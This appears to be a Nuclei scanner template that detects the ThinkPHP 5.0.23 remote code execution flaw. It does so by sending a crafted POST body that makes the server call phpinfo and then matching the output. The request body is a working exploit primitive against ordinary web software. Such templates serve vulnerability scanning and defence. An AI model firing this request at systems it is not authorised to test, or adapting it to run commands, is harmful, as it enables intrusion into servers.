id: thinkphp-5023-rce

info:
  name: ThinkPHP 5.0.23 RCE
  author: dr_set
  severity: critical
  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
  tags: thinkphp,rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?s=captcha"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and
      - type: status
        status:
          - 200